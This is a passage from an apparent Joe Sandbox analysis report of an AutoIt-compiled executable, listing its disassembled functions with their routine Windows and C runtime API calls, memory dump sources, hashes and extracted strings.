                                                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                                                        • String ID: >>>AUTOIT SCRIPT<<<
                                                                                        • API String ID: 1552873950-2806939583
                                                                                        • Opcode ID: aa1f1db790cc32ffd54d6d1240d15be1fa8de7641d75afd7b47c38ce8d3984c7
                                                                                        • Instruction ID: 15e0ecca24aec2cf5294578676532a1db2aa4cd3dda35516ab2ddf9e8a75cea7
                                                                                        • Opcode Fuzzy Hash: aa1f1db790cc32ffd54d6d1240d15be1fa8de7641d75afd7b47c38ce8d3984c7
                                                                                        • Instruction Fuzzy Hash: 8B512EB1D04219ABDF249F64DC41A9EBBB9FF48304F00049EF649A3282DB715A908F59
                                                                                        Function 00AC563D Relevance: 7.7, APIs: 5, Instructions: 163COMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memset$__filbuf__getptd_noexit__read_nolock_memcpy_s
                                                                                        • String ID:
                                                                                        • API String ID: 1559183368-0
                                                                                        • Opcode ID: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                        • Instruction ID: 07930c3b456502add2cbaa88f67ba6b7b7239657cdb370d0cefa6105a4742283
                                                                                        • Opcode Fuzzy Hash: 00b866a24d890f7fe79ae922164f866efed2fee1f991de586a4896b02612db73
                                                                                        • Instruction Fuzzy Hash: 62517F31E00B05DBDB249FB98980F6E77B5AF51360F6A8B2DF825962D0D770ADD09B40
                                                                                        Function 00AA52B0 Relevance: 7.6, APIs: 5, Instructions: 99windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AA52E6
                                                                                        • PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00AA534A
                                                                                        • TranslateMessage.USER32(?), ref: 00AA5356
                                                                                        • DispatchMessageW.USER32(?), ref: 00AA5360
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Message$Peek$DispatchTranslate
                                                                                        • String ID:
                                                                                        • API String ID: 1795658109-0
                                                                                        • Opcode ID: d5e3757e46c0d8700bddb2a1de20c075c2159137e53d5e4b43c8a1f939ea41f8
                                                                                        • Instruction ID: 47f0cbe1c7fd86fc3129c6191ff79aeae8345c0e06eba64a639a4c1a2ef44901
                                                                                        • Opcode Fuzzy Hash: d5e3757e46c0d8700bddb2a1de20c075c2159137e53d5e4b43c8a1f939ea41f8
                                                                                        • Instruction Fuzzy Hash: FE31F630D447069BDF308B74DC54BF977F8AB56344F24005AE4129B1D1DBF59889D725
                                                                                        Function 00AA1284 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • RegOpenKeyExW.KERNEL32(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00AA1275,SwapMouseButtons,00000004,?), ref: 00AA12A8
                                                                                        • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00AA1275,SwapMouseButtons,00000004,?), ref: 00AA12C9
                                                                                        • RegCloseKey.KERNEL32(00000000,?,?,?,80000001,80000001,?,00AA1275,SwapMouseButtons,00000004,?), ref: 00AA12EB
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseOpenQueryValue
                                                                                        • String ID: Control Panel\Mouse
                                                                                        • API String ID: 3677997916-824357125
                                                                                        • Opcode ID: 8defe200836875a8bb12a1a041660142bc7259b90f11b0271cd1f48274819ac4
                                                                                        • Instruction ID: 21964621cd86812669d9818346db3a445ed578adee61f271428512f13e10c80b
                                                                                        • Opcode Fuzzy Hash: 8defe200836875a8bb12a1a041660142bc7259b90f11b0271cd1f48274819ac4
                                                                                        • Instruction Fuzzy Hash: B6115775610208BFDB208FA4DC84EEEBBBCEF06740F108569F805D7250E7319E449BA4
                                                                                        Function 00AB5B29 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AB5B58
                                                                                          • Part of subcall function 00AB56F8: _memset.LIBCMT ref: 00AB5787
                                                                                          • Part of subcall function 00AB56F8: _wcscpy.LIBCMT ref: 00AB57DB
                                                                                          • Part of subcall function 00AB56F8: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AB57EB
                                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00AB5BAD
                                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00AB5BBC
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00AF0D7C
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                                        • String ID:
                                                                                        • API String ID: 1378193009-0
                                                                                        • Opcode ID: 308a22a97309fe3114bf6d4f5c06a7d1ee625a1e75f7015f9e35e51218565dc4
                                                                                        • Instruction ID: d47afb36d617a305c76ad25df784ab2fbfaf2864617b427cfed99b46386bdcf1
                                                                                        • Opcode Fuzzy Hash: 308a22a97309fe3114bf6d4f5c06a7d1ee625a1e75f7015f9e35e51218565dc4
                                                                                        • Instruction Fuzzy Hash: 5C21A7709047889FEB729B748895FFABBECAF02308F04049DE79A57282D7746984DB51
                                                                                        Function 00AB278A Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 260COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB49C2: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,00AB27AF,?,00000001), ref: 00AB49F4
                                                                                        • _free.LIBCMT ref: 00AEFB04
                                                                                        • _free.LIBCMT ref: 00AEFB4B
                                                                                          • Part of subcall function 00AB29BE: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00AB2ADF
                                                                                        Strings
                                                                                        • Bad directive syntax error, xrefs: 00AEFB33
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                                                        • String ID: Bad directive syntax error
                                                                                        • API String ID: 2861923089-2118420937
                                                                                        • Opcode ID: c75daf7808bceca452b66a9854439db663d7c2d0a68310b116a1687f10b5473f
                                                                                        • Instruction ID: dfd823987b93615242983d211c5911c4d0a250ed49ad8902d08761f1900e9a17
                                                                                        • Opcode Fuzzy Hash: c75daf7808bceca452b66a9854439db663d7c2d0a68310b116a1687f10b5473f
                                                                                        • Instruction Fuzzy Hash: 82918171910259AFCF04EFA5CD919EEB7B8FF09310F14457AF815AB2A2DB30AA05CB50
                                                                                        Function 00B09CF1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AB4AB2: __fread_nolock.LIBCMT ref: 00AB4AD0
                                                                                        • _wcscmp.LIBCMT ref: 00B09DE1
                                                                                        • _wcscmp.LIBCMT ref: 00B09DF4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _wcscmp$__fread_nolock
                                                                                        • String ID: FILE
                                                                                        • API String ID: 4029003684-3121273764
                                                                                        • Opcode ID: 5f1c4a98c97b95ae730b6346df1b08585fba33dc0b3563db800586c0d2aa7eae
                                                                                        • Instruction ID: 256325bc0afcf1303ba240482d03717a538d84035f3f3a7c363fd789d5626198
                                                                                        • Opcode Fuzzy Hash: 5f1c4a98c97b95ae730b6346df1b08585fba33dc0b3563db800586c0d2aa7eae
                                                                                        • Instruction Fuzzy Hash: 93411972A40209BADF21DAA0CC45FEF7BFDDF49710F0040AAFA00A71D2D6719D458765
                                                                                        Function 00AB31BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AF032B
                                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 00AF0375
                                                                                          • Part of subcall function 00AC0284: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00AB2A58,?,00008000), ref: 00AC02A4
                                                                                          • Part of subcall function 00AC09C5: GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00AC09E4
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                                        • String ID: X
                                                                                        • API String ID: 3777226403-3081909835
                                                                                        • Opcode ID: b128cc9d69ad31daba4d0c28fb02a405418878ee133c2d205890177baa1bad60
                                                                                        • Instruction ID: 26c3122777fdc6ba6b6dc64739382371730c04df911dd581a6cef7e72e611604
                                                                                        • Opcode Fuzzy Hash: b128cc9d69ad31daba4d0c28fb02a405418878ee133c2d205890177baa1bad60
                                                                                        • Instruction Fuzzy Hash: 5B218472A002989BDF41DFD4C845BEE7BFCAF49304F10415AE504A7242DBB4598CDF91
                                                                                        Function 00B1D1C6 Relevance: 4.9, APIs: 3, Instructions: 392COMMON
                                                                                        Download Yara Rule
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 46b857f49f4dae25f6952e320f879c04b01da663de07b51c2647c966df42ea2e
                                                                                        • Instruction ID: b5b381e7e0fc34e72374efb682d4654bd63d49abb41328970e53b459a4693d06
                                                                                        • Opcode Fuzzy Hash: 46b857f49f4dae25f6952e320f879c04b01da663de07b51c2647c966df42ea2e
                                                                                        • Instruction Fuzzy Hash: 53F148706083019FC714DF28C584AAABBE5FF89314F54896EF8999B391DB70E945CF82
                                                                                        Function 00AB1680 Relevance: 4.7, APIs: 3, Instructions: 187COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _memmove
                                                                                        • String ID:
                                                                                        • API String ID: 4104443479-0
                                                                                        • Opcode ID: 640418fc4a4e66c69b5c6b29111438bdf5d8dbe1ef7e592f2621b39ae2d20bc5
                                                                                        • Instruction ID: 75872148bbd871b4a81d8fa564858bea2decdbd256578608605395dafd310d57
                                                                                        • Opcode Fuzzy Hash: 640418fc4a4e66c69b5c6b29111438bdf5d8dbe1ef7e592f2621b39ae2d20bc5
                                                                                        • Instruction Fuzzy Hash: 8261DE71600209EBDF048F29D991BAA7BB9FF44310F5581A9EC19CF296EB31D9A0CB50
                                                                                        Function 00AAAAAA Relevance: 4.7, APIs: 3, Instructions: 168comCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00AC07EC
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(00000010,00000000), ref: 00AC07F4
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00AC07FF
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00AC080A
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(00000011,00000000), ref: 00AC0812
                                                                                          • Part of subcall function 00AC07BB: MapVirtualKeyW.USER32(00000012,00000000), ref: 00AC081A
                                                                                          • Part of subcall function 00ABFF4C: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,00AAAC6B), ref: 00ABFFA7
                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00AAAD08
                                                                                        • OleInitialize.OLE32(00000000), ref: 00AAAD85
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00AE2F56
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                                        • String ID:
                                                                                        • API String ID: 1986988660-0
                                                                                        • Opcode ID: 9b8e7e205bb246a1b2abe2ac1cbb09ea0a129ca05e902e79df58edcdfe661653
                                                                                        • Instruction ID: 0b8b4160750ddb40ca28ef4acd2a1e1760ba107118d08feaae942662265a1a9d
                                                                                        • Opcode Fuzzy Hash: 9b8e7e205bb246a1b2abe2ac1cbb09ea0a129ca05e902e79df58edcdfe661653
                                                                                        • Instruction Fuzzy Hash: FD81ACB19A92408EC384EF39AD596657FE8FB5830C71082AAD419C73F2EFB84805CF55
                                                                                        Function 00AB59D3 Relevance: 4.6, APIs: 3, Instructions: 77windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00AB59F9
                                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00AB5A9E
                                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00AB5ABB
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: IconNotifyShell_$_memset
                                                                                        • String ID:
                                                                                        • API String ID: 1505330794-0
                                                                                        • Opcode ID: d512004cc80b227f8e378c94ccbfbb2f8b90577102eed9c148a6aaab439b8ead
                                                                                        • Instruction ID: 0f997bc31106662d65bf21bb49310338295d1f569aa1a3e30bb6bd2959fd2701
                                                                                        • Opcode Fuzzy Hash: d512004cc80b227f8e378c94ccbfbb2f8b90577102eed9c148a6aaab439b8ead
                                                                                        • Instruction Fuzzy Hash: 2D3191709047018FD720DF34D898697BBF8AB49308F000A2EF59A93281DBB5A944CB51
                                                                                        Function 00AC593C Relevance: 4.6, APIs: 3, Instructions: 59memoryCOMMONLIBRARYCODE
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • __FF_MSGBANNER.LIBCMT ref: 00AC5953
                                                                                          • Part of subcall function 00ACA39B: __NMSG_WRITE.LIBCMT ref: 00ACA3C2
                                                                                          • Part of subcall function 00ACA39B: __NMSG_WRITE.LIBCMT ref: 00ACA3CC
                                                                                        • __NMSG_WRITE.LIBCMT ref: 00AC595A
                                                                                          • Part of subcall function 00ACA3F8: GetModuleFileNameW.KERNEL32(00000000,00B653BA,00000104,00000004,00000001,00AC1003), ref: 00ACA48A
                                                                                          • Part of subcall function 00ACA3F8: ___crtMessageBoxW.LIBCMT ref: 00ACA538
                                                                                          • Part of subcall function 00AC32CF: ___crtCorExitProcess.LIBCMT ref: 00AC32D5
                                                                                          • Part of subcall function 00AC32CF: ExitProcess.KERNEL32 ref: 00AC32DE
                                                                                          • Part of subcall function 00AC8D58: __getptd_noexit.LIBCMT ref: 00AC8D58
                                                                                        • RtlAllocateHeap.NTDLL(01110000,00000000,00000001,?,00000004,?,?,00AC1003,?), ref: 00AC597F
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                                        • String ID:
                                                                                        • API String ID: 1372826849-0
                                                                                        • Opcode ID: 3c0dc9cfa97445e11a7ab9514b0f68858a3d67818f502e445ce9ea643b3e6932
                                                                                        • Instruction ID: 28f464722fc9a66511c73cf0f418f798f9e9573d7f0f2290b4cef97767db2c22
                                                                                        • Opcode Fuzzy Hash: 3c0dc9cfa97445e11a7ab9514b0f68858a3d67818f502e445ce9ea643b3e6932
                                                                                        • Instruction Fuzzy Hash: D401F136701B16DBEA212B34AD12F2E3258DF62770F13056EF815AF2D1DEB4AD8047A1
                                                                                        Function 00B092C8 Relevance: 4.5, APIs: 3, Instructions: 22COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _free.LIBCMT ref: 00B092D6
                                                                                          • Part of subcall function 00AC2F85: RtlFreeHeap.NTDLL(00000000,00000000,?,00AC9C54,00000000,00AC8D5D,00AC59C3), ref: 00AC2F99
                                                                                          • Part of subcall function 00AC2F85: GetLastError.KERNEL32(00000000,?,00AC9C54,00000000,00AC8D5D,00AC59C3), ref: 00AC2FAB
                                                                                        • _free.LIBCMT ref: 00B092E7
                                                                                        • _free.LIBCMT ref: 00B092F9
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                        • Instruction ID: a2f872ec899874b1987736d903a4f717c285e7c54018cb21099e5d1760d91966
                                                                                        • Opcode Fuzzy Hash: d545b8d0ab5e92762063c3ba8b14d4eaebd98453bfde93cefd35328ad8659e4d
                                                                                        • Instruction Fuzzy Hash: D3E05BB170570257CA24A5786E40FD37BFC8FC9755716055DB449D71C3CE24F85182B8
                                                                                        Function 00AA5E83 Relevance: 4.1, APIs: 1, Strings: 1, Instructions: 551COMMON
                                                                                        Download Yara Rule
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: CALL
                                                                                        • API String ID: 0-4196123274
                                                                                        • Opcode ID: d6198c26c6f9892260293f12f838966dd27d3c20fd0c425d3fd6d215ad5ab816
                                                                                        • Instruction ID: 28635b9790d89414570629b19eea522ce1f1f2212042f872f26c7a15aa35f3ae
                                                                                        • Opcode Fuzzy Hash: d6198c26c6f9892260293f12f838966dd27d3c20fd0c425d3fd6d215ad5ab816
                                                                                        • Instruction Fuzzy Hash: 95322974508341DFDB24DF14C590A6ABBF1BF86304F19856DE8869B3A2D735EC85CB82
                                                                                        Function 00AB48B0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 141COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
